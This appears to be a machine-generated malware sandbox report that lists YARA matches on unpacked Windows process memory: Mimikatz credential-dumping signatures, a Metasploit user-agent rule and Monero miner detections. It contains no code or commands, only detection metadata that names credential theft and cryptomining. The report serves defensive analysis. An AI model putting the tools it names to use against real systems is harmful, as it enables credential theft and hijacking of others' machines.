      Source: 35.0.svchost.exe.857468.4.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b42000.40.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f42c68.51.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b77268.35.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 27.0.svchost.exe.522c68.2.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f42c68.8.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b82a68.47.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 32.2.ctfmon.exe.750000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 15.0.ctfmon.exe.9a2c68.4.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f37468.45.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f37468.29.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 32.2.ctfmon.exe.787468.2.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f37468.50.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 0.2.wuauclt.exe.14eb928.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Metasploit_Framework_UA date = 2018-08-16, author = Florian Roth, description = Detects User Agent used in Metasploit Framework, reference = https://github.com/rapid7/metasploit-framework/commit/12a6d67be48527f5d3987e40cac2a0cbb4ab6ce7, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 1743e1bd4176ffb62a1a0503a0d76033752f8bd34f6f09db85c2979c04bbdd29
      Source: 21.0.SearchProtocolHost.exe.2fe2c68.2.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 35.0.svchost.exe.820000.3.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b77268.27.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 27.0.svchost.exe.4e0000.3.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b77268.59.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 24.0.dllhost.exe.2e37468.4.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 32.0.ctfmon.exe.792c68.2.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b42000.52.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 27.2.svchost.exe.522c68.1.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f37468.23.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 16.0.dllhostex.exe.1290000.3.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
      Source: 16.0.dllhostex.exe.1290000.3.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: 16.0.dllhostex.exe.1290000.3.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 16.2.dllhostex.exe.1290000.0.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
      Source: 16.2.dllhostex.exe.1290000.0.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: 16.2.dllhostex.exe.1290000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 2.3.svchost.exe.4f37468.57.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b42000.58.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f42c68.30.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f00000.22.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 16.0.dllhostex.exe.1290000.1.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
      Source: 16.0.dllhostex.exe.1290000.1.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: 16.0.dllhostex.exe.1290000.1.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 2.2.svchost.exe.30b5240.2.unpack, type: UNPACKEDPEMatched rule: MAL_Metasploit_Framework_UA date = 2018-08-16, author = Florian Roth, description = Detects User Agent used in Metasploit Framework, reference = https://github.com/rapid7/metasploit-framework/commit/12a6d67be48527f5d3987e40cac2a0cbb4ab6ce7, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 1743e1bd4176ffb62a1a0503a0d76033752f8bd34f6f09db85c2979c04bbdd29
      Source: 2.3.svchost.exe.4f37468.32.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 33.0.ctfmon.exe.7c7468.2.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 15.0.ctfmon.exe.997468.2.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b77268.41.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b77268.54.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
